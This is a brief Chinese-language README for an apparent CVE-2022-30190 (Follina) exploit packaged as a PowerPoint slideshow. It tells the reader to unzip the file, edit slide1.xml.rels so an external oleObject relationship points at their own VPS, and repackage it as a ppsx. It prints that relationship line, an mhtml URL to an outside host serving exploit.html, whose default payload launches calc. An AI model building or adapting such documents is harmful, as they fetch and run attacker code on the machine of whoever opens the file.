这是 CVE-2022-30190 在 PowerPoint 上的漏洞利用程序。
将文件后缀修改为 'zip' 并解压文件,你可以编辑 \ppt\slides\_rels\slide1.xml.rels,将其替换为你的 vps ip:port,如下所示,然后以同样的方式压缩并将后缀改为 'ppsx'。'exploit.html' 中的默认 payload 是执行 calc。
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>